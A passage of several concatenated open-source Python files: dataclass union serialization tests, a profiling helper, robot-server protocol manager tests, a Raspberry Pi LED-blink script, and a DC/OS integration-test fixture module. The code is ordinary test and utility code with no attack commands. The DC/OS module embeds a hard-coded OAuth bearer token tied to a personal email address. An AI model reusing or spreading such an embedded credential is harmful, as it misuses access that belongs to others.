    # Union of dataclasses that themselves contain unions.
    f1: Union[C5, C6]
@dataclass_json
@dataclass
class C8:
    # Union members as dict values.
    f1: Dict[str, Union[Aux1, Aux2]]
@dataclass_json
@dataclass
class C9:
    # Union members as list elements.
    f1: List[Union[Aux1, Aux2]]
# Each entry is (instance, expected dict from dump(), expected JSON from
# dumps()); the same table is used in reverse for the load()/loads() tests.
params = [
    (C1(f1=12), {"f1": 12}, '{"f1": 12}'),
    (C1(f1="str1"), {"f1": "str1"}, '{"f1": "str1"}'),
    (C2(f1=10), {"f1": 10}, '{"f1": 10}'),
    (C2(f1={"str1": 0.12}), {"f1": {"str1": 0.12}}, '{"f1": {"str1": 0.12}}'),
    (C3(f1=10), {"f1": 10}, '{"f1": 10}'),
    (C3(f1=[0.12, 0.13, 0.14]), {"f1": [0.12, 0.13, 0.14]}, '{"f1": [0.12, 0.13, 0.14]}'),
    (C4(f1=Aux1(1)), {"f1": {"f1": 1, "__type": "Aux1"}}, '{"f1": {"f1": 1, "__type": "Aux1"}}'),
    (C4(f1=Aux2("str1")), {"f1": {"f1": "str1", "__type": "Aux2"}}, '{"f1": {"f1": "str1", "__type": "Aux2"}}'),
    (C5(f1=Aux1(1)), {"f1": {"f1": 1, "__type": "Aux1"}}, '{"f1": {"f1": 1, "__type": "Aux1"}}'),
    (C5(f1=Aux2("str1")), {"f1": {"f1": "str1", "__type": "Aux2"}}, '{"f1": {"f1": "str1", "__type": "Aux2"}}'),
    (C5(f1=None), {"f1": None}, '{"f1": null}'),
    (C6(f1=Aux1(1)), {"f1": {"f1": 1}}, '{"f1": {"f1": 1}}'),  # For Optionals, type can be clearly defined
    (C6(f1=None), {"f1": None}, '{"f1": null}'),
    (C7(C5(Aux2("str1"))),
     {"f1": {"f1": {"f1": "str1", "__type": "Aux2"}, "__type": "C5"}},
     '{"f1": {"f1": {"f1": "str1", "__type": "Aux2"}, "__type": "C5"}}'),
    (C7(C6(Aux1(12))),
     {"f1": {"f1": {"f1": 12}, "__type": "C6"}},
     '{"f1": {"f1": {"f1": 12}, "__type": "C6"}}'),
    (C8({"str1": Aux1(12), "str2": Aux2("str3")}),
     {"f1": {"str1": {"f1": 12, "__type": "Aux1"}, "str2": {"f1": "str3", "__type": "Aux2"}}},
     '{"f1": {"str1": {"f1": 12, "__type": "Aux1"}, "str2": {"f1": "str3", "__type": "Aux2"}}}'),
    (C9([Aux1(12), Aux2("str3")]),
     {"f1": [{"f1": 12, "__type": "Aux1"}, {"f1": "str3", "__type": "Aux2"}]},
     '{"f1": [{"f1": 12, "__type": "Aux1"}, {"f1": "str3", "__type": "Aux2"}]}')
]
@pytest.mark.parametrize('obj, expected, expected_json', params)
def test_serialize(obj, expected, expected_json):
    """Dumping each object must produce the expected dict and JSON string."""
    schema = obj.schema()
    assert schema.dump(obj) == expected
    assert schema.dumps(obj) == expected_json
@pytest.mark.parametrize('expected_obj, data, data_json', params)
def test_deserialize(expected_obj, data, data_json):
    """Loading the dict and the JSON string must rebuild an equal object."""
    schema = type(expected_obj).schema()
    assert schema.load(data) == expected_obj
    assert schema.loads(data_json) == expected_obj
def test_deserialize_twice():
    """Loading the same payload twice must give equal, repeatable results."""
    data = {"f1": [{"f1": 12, "__type": "Aux1"}, {"f1": "str3", "__type": "Aux2"}]}
    expected_obj = C9([Aux1(12), Aux2("str3")])

    schema = C9.schema()
    first, second = schema.load(data), schema.load(data)
    assert first == expected_obj and second == expected_obj
@pytest.mark.parametrize('obj', [
    (C2(f1={"str1": "str1"})),
    (C3(f1=[0.12, 0.13, "str1"])),
])
def test_serialize_with_error(obj):
    """Dumping a value that matches no union member must raise ValueError."""
    schema = obj.schema()
    with pytest.raises(ValueError):
        assert schema.dump(obj)
@pytest.mark.parametrize('cls, data', [
    (C1, {"f1": None}),
])
def test_deserialize_with_error(cls, data):
    """Loading a value that matches no union member must fail validation."""
    schema = cls.schema()
    with pytest.raises(ValidationError):
        assert schema.load(data)
| lidatong/dataclasses-json | tests/test_union.py | Python | mit | 3,904 |
# yadt-config-rpm-maker
# Copyright (C) 2011-2013 Immobilien Scout GmbH
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
This module contains functions which were created for performance
tweaking. The test coverage of this module is low since it's main
purpose is to add logging information.
"""
from functools import wraps
from logging import getLogger
from time import time
from os import walk
from os.path import join, getsize
from config_rpm_maker.configuration import get_thread_count
LOGGER = getLogger(__name__)

# When True every measured call is additionally logged via LOGGER.debug;
# the per-function summary is collected either way.
LOG_EACH_MEASUREMENT = False

# function name -> [accumulated seconds, number of calls]
_execution_time_summary = {}
def measure_execution_time(original_function):
    """Decorator: time every call of original_function and accumulate the
    result in the module-level _execution_time_summary dictionary."""

    def _record(duration_in_seconds, args, kwargs):
        # Render the call for optional per-call logging; the first
        # positional argument is treated as "self" and skipped.
        positional_text = ', '.join([str(argument) for argument in args[1:]])
        keyword_text = ", " + str(kwargs) if kwargs else ""

        if args:
            # key the summary by "<class of first argument>.<function>"
            qualified_name = "%s.%s" % (args[0].__class__.__name__, original_function.__name__)
        else:
            qualified_name = original_function.__name__

        entry = _execution_time_summary.get(qualified_name)
        if entry is None:
            _execution_time_summary[qualified_name] = [duration_in_seconds, 1]
        else:
            entry[0] += duration_in_seconds
            entry[1] += 1

        if LOG_EACH_MEASUREMENT:
            call_text = '%s(%s%s)' % (qualified_name, positional_text, keyword_text)
            LOGGER.debug('Took %.2fs to perform %s', duration_in_seconds, call_text)

    @wraps(original_function)
    def wrapped_function(*args, **kwargs):
        started_at = time()
        result = original_function(*args, **kwargs)
        duration_in_seconds = time() - started_at
        _record(duration_in_seconds, args, kwargs)
        return result

    return wrapped_function
def log_execution_time_summaries(logging_function):
    """Emit one line per measured function with call count, average and total
    time, using *logging_function* (e.g. ``LOGGER.info``) for output."""
    logging_function('Execution times summary (keep in mind thread_count was set to %s):', get_thread_count())
    for function_name in sorted(_execution_time_summary.keys()):
        total_seconds, call_count = _execution_time_summary[function_name]
        logging_function(' %5s times with average %5.2fs = sum %7.2fs : %s',
                         call_count, total_seconds / call_count,
                         total_seconds, function_name)
def log_directories_summary(logging_function, start_path):
    """Log file counts and byte totals for *start_path* and each of its
    immediate subdirectories (subdirectories are summed recursively; the
    entry for *start_path* itself counts only its top-level files).

    Args:
        logging_function: callable with a logging signature, e.g. LOGGER.info
        start_path: directory to summarize
    """
    directories_summary = {}
    # next(walk(...)) yields only the top level.  The original code used the
    # Python-2-only generator method ``.next()``, which raises AttributeError
    # on Python 3; the ``next()`` builtin works on both (2.6+).  A single call
    # also replaces the two separate walks the original performed.
    _top_dir, directories, top_level_files = next(walk(start_path))
    absolute_count_of_files = 0
    absolute_total_size = 0
    for file_name in top_level_files:
        absolute_total_size += getsize(join(start_path, file_name))
        absolute_count_of_files += 1
    # Recorded before subdirectories are added: the start_path entry reflects
    # top-level files only, while the "Found ..." line reports the grand total.
    directories_summary[start_path] = (absolute_count_of_files,
                                       absolute_total_size)
    for directory in directories:
        total_size = 0
        count_of_files = 0
        directory_path = join(start_path, directory)
        for dirpath, _dirnames, filenames in walk(directory_path):
            for file_name in filenames:
                file_size = getsize(join(dirpath, file_name))
                total_size += file_size
                absolute_total_size += file_size
                count_of_files += 1
                absolute_count_of_files += 1
        directories_summary[directory_path] = (count_of_files, total_size)
    logging_function('Found %d files in directory "%s" with a total size of %d bytes', absolute_count_of_files, start_path, absolute_total_size)
    for directory in sorted(directories_summary.keys()):
        count_of_files = directories_summary[directory][0]
        total_size = directories_summary[directory][1]
        logging_function(' %5d files with total size of %10d bytes in directory "%s"', count_of_files, total_size, directory)
| yadt/yadt-config-rpm-maker | src/config_rpm_maker/utilities/profiler.py | Python | gpl-3.0 | 4,724 |
from pathlib import Path
import pytest
from unittest.mock import MagicMock, patch
from robot_server.service.protocol import errors
from robot_server.service.protocol.manager import ProtocolManager, UploadFile
from robot_server.service.protocol.protocol import UploadedProtocolMeta, \
UploadedProtocol
@pytest.fixture
def mock_upload_file():
    """Fixture: an UploadFile mock whose filename looks like a python protocol."""
    upload = MagicMock(spec=UploadFile)
    upload.filename = "some_file_name.py"
    return upload
@pytest.fixture
def mock_uploaded_protocol(mock_upload_file):
    """Fixture: a bare UploadedProtocol mock (metadata attached elsewhere)."""
    return MagicMock(spec=UploadedProtocol)
@pytest.fixture
def mock_uploaded_control_constructor(mock_uploaded_protocol):
    """Patch the UploadedProtocol constructor used by the manager so it
    returns the shared mock, tagging it with metadata built from the id."""
    def _fake_constructor(protocol_id, protocol_file, support_files):
        # Mimic the real constructor just enough: attach meta carrying the id.
        mock_uploaded_protocol.meta = UploadedProtocolMeta(
            identifier=protocol_id,
            protocol_file=None,
            directory=None)
        return mock_uploaded_protocol

    with patch("robot_server.service.protocol.manager.UploadedProtocol") as patched:
        patched.side_effect = _fake_constructor
        yield patched
@pytest.fixture
def manager_with_mock_protocol(mock_uploaded_control_constructor,
                               mock_upload_file):
    """Fixture: a ProtocolManager pre-loaded with one mocked protocol."""
    protocol_manager = ProtocolManager()
    protocol_manager.create(mock_upload_file, [])
    return protocol_manager
class TestCreate:
    """Tests for ProtocolManager.create."""

    def test_create(self, mock_uploaded_control_constructor,
                    mock_upload_file, mock_uploaded_protocol):
        """create() builds an UploadedProtocol and registers it by identifier."""
        manager = ProtocolManager()
        p = manager.create(mock_upload_file, [])
        # The protocol id is the uploaded file name without its extension.
        mock_uploaded_control_constructor.assert_called_once_with(
            Path(mock_upload_file.filename).stem, mock_upload_file, [])
        assert p == mock_uploaded_protocol
        assert manager._protocols[mock_uploaded_protocol.meta.identifier] == p

    def test_create_already_exists(self,
                                   mock_upload_file,
                                   manager_with_mock_protocol):
        """Uploading the same protocol name twice is rejected."""
        with pytest.raises(errors.ProtocolAlreadyExistsException):
            manager_with_mock_protocol.create(mock_upload_file, [])

    def test_create_upload_limit_reached(self,
                                         mock_upload_file,
                                         manager_with_mock_protocol,
                                         monkeypatch):
        """Creating more than MAX_COUNT protocols is rejected."""
        # Fix: patch the class attribute via monkeypatch rather than assigning
        # `ProtocolManager.MAX_COUNT = 1` directly — the direct assignment
        # leaked the lowered limit into every test that ran afterwards.
        monkeypatch.setattr(ProtocolManager, 'MAX_COUNT', 1)
        m = MagicMock(spec=UploadFile)
        m.filename = "123_" + mock_upload_file.filename
        with pytest.raises(errors.ProtocolUploadCountLimitReached):
            manager_with_mock_protocol.create(m, [])

    @pytest.mark.parametrize(argnames="exception", argvalues=[
        TypeError, IOError
    ])
    def test_create_raises(self,
                           exception,
                           mock_upload_file,
                           mock_uploaded_protocol):
        """TypeError/IOError during construction surface as ProtocolIOException."""
        with patch("robot_server.service.protocol.manager.UploadedProtocol") \
                as mock_construct:
            def raiser(*args, **kwargs):
                raise exception()
            mock_construct.side_effect = raiser
            with pytest.raises(errors.ProtocolIOException):
                manager = ProtocolManager()
                manager.create(mock_upload_file, [])
class TestGet:
    """Tests for ProtocolManager.get."""

    def test_get(self, manager_with_mock_protocol, mock_uploaded_protocol):
        """A known identifier returns the stored protocol."""
        identifier = mock_uploaded_protocol.meta.identifier
        assert manager_with_mock_protocol.get(identifier) == \
            mock_uploaded_protocol

    def test_not_found(self, manager_with_mock_protocol):
        """An unknown identifier raises ProtocolNotFoundException."""
        with pytest.raises(errors.ProtocolNotFoundException):
            manager_with_mock_protocol.get("___")
class TestGetAll:
    """Tests for ProtocolManager.get_all."""

    def test_get_all(self, manager_with_mock_protocol, mock_uploaded_protocol):
        """Every stored protocol is yielded."""
        stored = list(manager_with_mock_protocol.get_all())
        assert stored == [mock_uploaded_protocol]

    def test_get_none(self):
        """A freshly constructed manager holds no protocols."""
        assert list(ProtocolManager().get_all()) == []
class TestRemove:
    """Tests for ProtocolManager.remove."""

    def test_remove(self, manager_with_mock_protocol, mock_uploaded_protocol):
        """Removing deregisters the protocol and cleans up its files."""
        identifier = mock_uploaded_protocol.meta.identifier
        manager_with_mock_protocol.remove(identifier)
        assert identifier not in manager_with_mock_protocol._protocols
        mock_uploaded_protocol.clean_up.assert_called_once()

    def test_remove_not_found(self, manager_with_mock_protocol):
        """Removing an unknown identifier raises ProtocolNotFoundException."""
        with pytest.raises(errors.ProtocolNotFoundException):
            manager_with_mock_protocol.remove("___")
class TestRemoveAll:
    """Tests for ProtocolManager.remove_all."""

    def test_remove_all(self,
                        manager_with_mock_protocol,
                        mock_uploaded_protocol):
        """remove_all cleans up every protocol and empties the registry."""
        manager_with_mock_protocol.remove_all()
        mock_uploaded_protocol.clean_up.assert_called_once()
        assert manager_with_mock_protocol._protocols == {}
| Opentrons/labware | robot-server/tests/service/protocol/test_manager.py | Python | apache-2.0 | 4,736 |
"""
Sponge Knowledge Base
Blinking LED
Raspberry Pi: Make sure that your Raspberry Pi is not powered! Then connect Grove LED to GPIO via a 4-pin connector:
- BLACK wire goes on PIN#14 (Ground),
- RED wire goes on PIN#02 (DC Power 5V),
- YELLOW wire goes on PIN#12 (GPIO18/GPIO_GEN1),
- WHITE wire goes on PIN#06 (Ground).
"""
from com.pi4j.io.gpio import RaspiPin, PinState
# Current LED output level; flipped on every "blink" event.
state = False
class LedBlink(Trigger):
    """Sponge trigger that toggles the LED each time a "blink" event fires."""
    def onConfigure(self):
        # Subscribe this trigger to the "blink" event.
        self.withEvent("blink")
    def onRun(self, event):
        global led, state
        # Invert the remembered level and push it to the GPIO pin.
        state = not state
        led.setState(state)
def onStartup():
    """Provision GPIO_01 as the LED output pin and start the blink timer."""
    global led
    # Pin starts LOW (LED off); "led" is this pin's name within pi4j.
    led = pi.gpio.provisionDigitalOutputPin(RaspiPin.GPIO_01, "led", PinState.LOW)
    # Fire the "blink" event immediately, then every 1000 ms.
    sponge.event("blink").sendAfter(0, 1000)
def onShutdown():
    """On knowledge-base shutdown, write the last toggle value to the LED."""
    global led
    if led is not None:
        # NOTE(review): this writes the *current* toggle value, not LOW — if
        # the intent was to switch the LED off on shutdown, confirm and use a
        # fixed low level instead.
        led.setState(state)
| softelnet/sponge | sponge-rpi-pi4j/examples/rpi-pi4j/pi4j_led_blink.py | Python | apache-2.0 | 830 |
# -*- coding: utf-8 -*-
#
# This file is part of CERN Analysis Preservation Framework.
# Copyright (C) 2018 CERN.
#
# CERN Analysis Preservation Framework is free software; you can redistribute
# it and/or modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 2 of the
# License, or (at your option) any later version.
#
# CERN Analysis Preservation Framework is distributed in the hope that it will
# be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with CERN Analysis Preservation Framework; if not, write to the
# Free Software Foundation, Inc., 59 Temple Place, Suite 330, Boston,
# MA 02111-1307, USA.
#
# In applying this license, CERN does not
# waive the privileges and immunities granted to it by virtue of its status
# as an Intergovernmental Organization or submit itself to any jurisdiction.
"""User module errors."""
class DoesNotExistInLDAP(Exception):
    """Raised when an account is not registered in LDAP."""
| tiborsimko/analysis-preservation.cern.ch | cap/modules/user/errors.py | Python | gpl-2.0 | 1,215 |
import collections
import contextlib
import copy
import gzip
import json
import logging
import os
import tempfile
import urllib.parse
import uuid
import zipfile
import boto3
import botocore.exceptions
import bs4
import dns.exception
import dns.resolver
import kazoo.client
import pytest
import requests
import retrying
# Verbosity applied to the root logger by _setup_logging().
LOG_LEVEL = logging.INFO
# Marathon app id template; filled with a per-test UUID.
TEST_APP_NAME_FMT = '/integration-test-{}'
MESOS_DNS_ENTRY_UPDATE_TIMEOUT = 60  # in seconds
# Health ("3DT") API endpoint and ports — presumably consumed by diagnostics
# tests elsewhere in the suite; unused in this chunk.
BASE_ENDPOINT_3DT = '/system/health/v1'
PORT_3DT = 1050
PORT_3DT_AGENT = 61001
# If auth is enabled, by default, tests use hard-coded OAuth token
AUTH_ENABLED = os.getenv('DCOS_AUTH_ENABLED', 'true') == 'true'
# Set these to run test against a custom configured user instead
LOGIN_UNAME = os.getenv('DCOS_LOGIN_UNAME')
LOGIN_PW = os.getenv('DCOS_LOGIN_PW')
@pytest.fixture(scope='module')
def cluster():
    """Build the module-scoped Cluster proxy from required environment
    variables, failing fast when any of them is missing or malformed."""
    env = os.environ
    for required_var in ('DCOS_DNS_ADDRESS', 'MASTER_HOSTS',
                         'PUBLIC_MASTER_HOSTS', 'SLAVE_HOSTS',
                         'PUBLIC_SLAVE_HOSTS', 'DNS_SEARCH',
                         'DCOS_PROVIDER'):
        assert required_var in env
    # dns_search must be true or false (prevents misspellings)
    assert env['DNS_SEARCH'] in ['true', 'false']
    assert env['DCOS_PROVIDER'] in ['onprem', 'aws', 'azure']
    _setup_logging()
    return Cluster(dcos_uri=env['DCOS_DNS_ADDRESS'],
                   masters=env['MASTER_HOSTS'].split(','),
                   public_masters=env['PUBLIC_MASTER_HOSTS'].split(','),
                   slaves=env['SLAVE_HOSTS'].split(','),
                   public_slaves=env['PUBLIC_SLAVE_HOSTS'].split(','),
                   registry=os.getenv('REGISTRY_HOST'),
                   dns_search_set=env['DNS_SEARCH'],
                   provider=env['DCOS_PROVIDER'])
@pytest.fixture(scope='module')
def auth_cluster(cluster):
    """The shared cluster fixture, available only when auth is enabled."""
    if AUTH_ENABLED:
        return cluster
    pytest.skip("Skipped because not running against cluster with auth.")
@pytest.fixture(scope='module')
def registry_cluster(cluster, request):
    """Provides a cluster that has a registry deployed via marathon.
    Note: cluster nodes must have hard-coded certs from dcos.git installed
    """
    # Reuse an externally supplied registry (REGISTRY_HOST) when present.
    if cluster.registry:
        return cluster
    # Deploy a private Docker registry as a Marathon app; its health check
    # probes the registry catalog over HTTPS through Mesos-DNS.
    registry_app = {
        "id": "/registry",
        "cmd": "docker run -p $PORT0:5000 mesosphere/test_registry:latest",
        "cpus": 0.1,
        "mem": 128,
        "disk": 0,
        "instances": 1,
        "healthChecks": [{
            "protocol": "COMMAND",
            "command": {
                "value": "curl -sSfv https://registry.marathon.mesos.thisdcos.directory:$PORT0/v2/_catalog"}
        }],
        "ports": [0],
    }
    endpoints = cluster.deploy_marathon_app(registry_app)
    # Record the registry's service address for later image references.
    cluster.registry = 'registry.marathon.mesos.thisdcos.directory:'+str(endpoints[0].port)
    # Second app: builds the test_server image on a node and pushes it to the
    # registry, then idles; its health check confirms the pushed manifest.
    docker_cmds = """
    #!/bin/bash
    docker build -t {registry}/test_server /opt/mesosphere/active/dcos-integration-test/test_server
    docker push {registry}/test_server
    sleep 36000
    """.format(registry=cluster.registry)
    docker_build_and_push_app = {
        'id': '/build-and-push',
        'cmd': docker_cmds,
        'cpus': 0.1,
        'mem': 64,
        'instances': 1,
        'healthChecks': [{
            'protocol': 'COMMAND',
            'command': {'value': 'curl -fsSlv https://{}/v2/test_server/manifests/latest'.format(cluster.registry)},
            'gracePeriodSeconds': 400
        }]
    }
    # Image build + push can be slow, hence the extended timeout.
    cluster.deploy_marathon_app(docker_build_and_push_app, timeout=500)
    def kill_registry():
        # Teardown: remove both helper apps when the module finishes.
        cluster.destroy_marathon_app(docker_build_and_push_app['id'])
        cluster.destroy_marathon_app(registry_app['id'])
    request.addfinalizer(kill_registry)
    return cluster
def _setup_logging():
    """Configure root logging for the integration-test run.

    Safe to call more than once (it runs inside a module-scoped fixture, so
    several test modules may invoke it): the stream handler is attached only
    when the root logger has none yet, preventing duplicated log lines.
    """
    logger = logging.getLogger()
    logger.setLevel(LOG_LEVEL)
    if not logger.handlers:
        fmt = logging.Formatter('[%(asctime)s] %(levelname)s: %(message)s')
        handler = logging.StreamHandler()
        handler.setFormatter(fmt)
        logger.addHandler(handler)
    # requests is chatty at INFO; keep only warnings and above from it.
    logging.getLogger("requests").setLevel(logging.WARNING)
@contextlib.contextmanager
def _remove_env_vars(*env_vars):
environ = dict(os.environ)
for env_var in env_vars:
try:
del os.environ[env_var]
except KeyError:
pass
try:
yield
finally:
os.environ.clear()
os.environ.update(environ)
def _delete_ec2_volume(name, timeout=300):
    """Delete an EC2 EBS volume by its "Name" tag
    Args:
        timeout: seconds to wait for volume to become available for deletion
    """
    # Deleting an attached volume raises ClientError; retry every 30s until
    # the volume detaches or the timeout elapses.
    @retrying.retry(wait_fixed=30 * 1000, stop_max_delay=timeout * 1000,
                    retry_on_exception=lambda exc: isinstance(exc, botocore.exceptions.ClientError))
    def _delete_volume(volume):
        volume.delete()  # Raises ClientError if the volume is still attached.
    def _get_current_aws_region():
        # The instance-metadata AZ (e.g. "us-east-1a") minus its last
        # character is the region name.
        try:
            return requests.get('http://169.254.169.254/latest/meta-data/placement/availability-zone').text.strip()[:-1]
        except requests.RequestException as ex:
            logging.warning("Can't get AWS region from instance metadata: {}".format(ex))
            return None
    # Remove AWS environment variables to force boto to use IAM credentials.
    with _remove_env_vars('AWS_ACCESS_KEY_ID', 'AWS_SECRET_ACCESS_KEY'):
        volumes = list(boto3.session.Session(
            # We assume we're running these tests from a cluster node, so we
            # can assume the region for the instance on which we're running is
            # the same region in which any volumes were created.
            region_name=_get_current_aws_region(),
        ).resource('ec2').volumes.filter(Filters=[{'Name': 'tag:Name', 'Values': [name]}]))
    # Exactly one match is required; anything else indicates a bad fixture.
    if len(volumes) == 0:
        raise Exception('no volumes found with name {}'.format(name))
    elif len(volumes) > 1:
        raise Exception('multiple volumes found with name {}'.format(name))
    volume = volumes[0]
    try:
        _delete_volume(volume)
    except retrying.RetryError as ex:
        raise Exception('Operation was not completed within {} seconds'.format(timeout)) from ex
class Cluster:
    """Proxy for a running DC/OS cluster under integration test.

    Wraps HTTP access through Admin Router (injecting superuser auth
    headers when auth is enabled) and provides helpers to deploy and
    destroy Marathon applications.  Construction blocks until the core
    DC/OS services report healthy (see _wait_for_DCOS).
    """

    @retrying.retry(wait_fixed=1000,
                    retry_on_result=lambda ret: ret is False,
                    retry_on_exception=lambda x: False)
    def _wait_for_Marathon_up(self):
        """Poll the Marathon UI until it stops answering with 5xx."""
        r = self.get('/marathon/ui/')
        # resp_code >= 500 -> backend is still down probably
        if r.status_code < 500:
            logging.info("Marathon is probably up")
            return True
        else:
            msg = "Waiting for Marathon, resp code is: {}"
            logging.info(msg.format(r.status_code))
            return False

    @retrying.retry(wait_fixed=1000,
                    retry_on_result=lambda ret: ret is False,
                    retry_on_exception=lambda x: False)
    def _wait_for_slaves_to_join(self):
        """Poll the Mesos master until every known agent has registered."""
        r = self.get('/mesos/master/slaves')
        if r.status_code != 200:
            msg = "Mesos master returned status code {} != 200 "
            msg += "continuing to wait..."
            logging.info(msg.format(r.status_code))
            return False
        data = r.json()
        # Check that there are all the slaves the test knows about. They are all
        # needed to pass the test.
        num_slaves = len(data['slaves'])
        if num_slaves >= len(self.all_slaves):
            msg = "Sufficient ({} >= {}) number of slaves have joined the cluster"
            logging.info(msg.format(num_slaves, self.all_slaves))
            return True
        else:
            msg = "Current number of slaves: {} < {}, continuing to wait..."
            logging.info(msg.format(num_slaves, self.all_slaves))
            return False

    @retrying.retry(wait_fixed=1000,
                    retry_on_result=lambda ret: ret is False,
                    retry_on_exception=lambda x: False)
    def _wait_for_DCOS_history_up(self):
        """Poll the history service until it stops answering with 5xx."""
        r = self.get('/dcos-history-service/ping')
        # resp_code >= 500 -> backend is still down probably
        # Fixed: this previously compared with `<= 500`, wrongly treating an
        # HTTP 500 response as "up" (compare _wait_for_Marathon_up above).
        if r.status_code < 500:
            logging.info("DC/OS History is probably up")
            return True
        else:
            msg = "Waiting for DC/OS History, resp code is: {}"
            logging.info(msg.format(r.status_code))
            return False

    @retrying.retry(wait_fixed=1000,
                    retry_on_result=lambda ret: ret is False,
                    retry_on_exception=lambda x: False)
    def _wait_for_leader_election(self):
        """Poll Mesos-DNS (port 61053) until leader.mesos resolves."""
        mesos_resolver = dns.resolver.Resolver()
        mesos_resolver.nameservers = self.public_masters
        mesos_resolver.port = 61053
        try:
            # Yeah, we can also put it in retry_on_exception, but
            # this way we will loose debug messages
            mesos_resolver.query('leader.mesos', 'A')
        except dns.exception.DNSException as e:
            msg = "Cannot resolve leader.mesos, error string: '{}', continuing to wait"
            logging.info(msg.format(e))
            return False
        else:
            logging.info("leader.mesos dns entry is UP!")
            return True

    @retrying.retry(wait_fixed=1000,
                    retry_on_result=lambda ret: ret is False,
                    retry_on_exception=lambda x: False)
    def _wait_for_adminrouter_up(self):
        """Poll the cluster root URL until Admin Router accepts connections."""
        try:
            # Yeah, we can also put it in retry_on_exception, but
            # this way we will loose debug messages
            self.get(disable_suauth=True)
        except requests.ConnectionError as e:
            msg = "Cannot connect to nginx, error string: '{}', continuing to wait"
            logging.info(msg.format(e))
            return False
        else:
            logging.info("Nginx is UP!")
            return True

    def _wait_for_DCOS(self):
        """Block until the core DC/OS services are reachable and healthy."""
        self._wait_for_leader_election()
        self._wait_for_adminrouter_up()
        self._authenticate()
        self._wait_for_Marathon_up()
        self._wait_for_slaves_to_join()
        self._wait_for_DCOS_history_up()

    def _authenticate(self):
        """Log in and cache the superuser auth header/cookie (if auth is on)."""
        if AUTH_ENABLED:
            # token valid until 2036 for user albert@bekstil.net
            # {
            #   "email": "albert@bekstil.net",
            #   "email_verified": true,
            #   "iss": "https://dcos.auth0.com/",
            #   "sub": "google-oauth2|109964499011108905050",
            #   "aud": "3yF5TOSzdlI45Q1xspxzeoGBe9fNxm9m",
            #   "exp": 2090884974,
            #   "iat": 1460164974
            # }
            js = {'token': 'eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsImtpZCI6Ik9UQkVOakZFTWtWQ09VRTRPRVpGTlRNMFJrWXlRa015Tnprd1JrSkVRemRCTWpBM1FqYzVOZyJ9.eyJlbWFpbCI6ImFsYmVydEBiZWtzdGlsLm5ldCIsImVtYWlsX3ZlcmlmaWVkIjp0cnVlLCJpc3MiOiJodHRwczovL2Rjb3MuYXV0aDAuY29tLyIsInN1YiI6Imdvb2dsZS1vYXV0aDJ8MTA5OTY0NDk5MDExMTA4OTA1MDUwIiwiYXVkIjoiM3lGNVRPU3pkbEk0NVExeHNweHplb0dCZTlmTnhtOW0iLCJleHAiOjIwOTA4ODQ5NzQsImlhdCI6MTQ2MDE2NDk3NH0.OxcoJJp06L1z2_41_p65FriEGkPzwFB_0pA9ULCvwvzJ8pJXw9hLbmsx-23aY2f-ydwJ7LSibL9i5NbQSR2riJWTcW4N7tLLCCMeFXKEK4hErN2hyxz71Fl765EjQSO5KD1A-HsOPr3ZZPoGTBjE0-EFtmXkSlHb1T2zd0Z8T5Z2-q96WkFoT6PiEdbrDA-e47LKtRmqsddnPZnp0xmMQdTr2MjpVgvqG7TlRvxDcYc-62rkwQXDNSWsW61FcKfQ-TRIZSf2GS9F9esDF4b5tRtrXcBNaorYa9ql0XAWH5W_ct4ylRNl3vwkYKWa4cmPvOqT5Wlj9Tf0af4lNO40PQ'}  # noqa
            if LOGIN_UNAME and LOGIN_PW:
                js = {'uid': LOGIN_UNAME, 'password': LOGIN_PW}
        else:
            # no authentication required
            return
        r = requests.post(self.dcos_uri + '/acs/api/v1/auth/login', json=js)
        assert r.status_code == 200
        self.superuser_auth_header = {
            'Authorization': 'token=%s' % r.json()['token']
        }
        self.superuser_auth_cookie = r.cookies[
            'dcos-acs-auth-cookie']

    def __init__(self, dcos_uri, masters, public_masters, slaves, public_slaves, registry, dns_search_set, provider):
        """Proxy class for DC/OS clusters.

        Args:
            dcos_uri: address for the DC/OS web UI.
            masters: list of Mesos master advertised IP addresses.
            public_masters: list of Mesos master IP addresses routable from
                the local host.
            slaves: list of Mesos slave/agent advertised IP addresses.
            public_slaves: list of public Mesos slave/agent IP addresses.
            registry: hostname or IP address of a private Docker registry.
            dns_search_set: string indicating that a DNS search domain is
                configured if its value is "true".
            provider: onprem, azure, or aws
        """
        self.masters = sorted(masters)
        self.public_masters = sorted(public_masters)
        self.slaves = sorted(slaves)
        self.public_slaves = sorted(public_slaves)
        self.all_slaves = sorted(slaves+public_slaves)
        # "host1:2181,host2:2181,..." — ZooKeeper connection string.
        self.zk_hostports = ','.join(':'.join([host, '2181']) for host in self.public_masters)
        self.registry = registry
        self.dns_search_set = dns_search_set == 'true'
        self.provider = provider
        assert len(self.masters) == len(self.public_masters)
        # URI must include scheme
        assert dcos_uri.startswith('http')
        # Make URI never end with /
        self.dcos_uri = dcos_uri.rstrip('/')
        self._wait_for_DCOS()

    @staticmethod
    def _marathon_req_headers():
        """Headers Marathon expects on API requests."""
        return {'Accept': 'application/json, text/plain, */*'}

    def _suheader(self, disable_suauth):
        """Return the superuser auth header, or {} when auth is off/disabled."""
        if not disable_suauth and AUTH_ENABLED:
            return self.superuser_auth_header
        return {}

    def get(self, path="", params=None, disable_suauth=False, **kwargs):
        """GET *path* on the cluster, adding auth headers unless disabled."""
        hdrs = self._suheader(disable_suauth)
        hdrs.update(kwargs.pop('headers', {}))
        return requests.get(
            self.dcos_uri + path, params=params, headers=hdrs, **kwargs)

    def post(self, path="", payload=None, disable_suauth=False, **kwargs):
        """POST *payload* as JSON to *path* on the cluster."""
        hdrs = self._suheader(disable_suauth)
        hdrs.update(kwargs.pop('headers', {}))
        if payload is None:
            payload = {}
        # Fixed: extra keyword arguments were silently dropped here, unlike
        # in get()/delete(); forward them to requests.post as well.
        return requests.post(self.dcos_uri + path, json=payload, headers=hdrs,
                             **kwargs)

    def delete(self, path="", disable_suauth=False, **kwargs):
        """DELETE *path* on the cluster."""
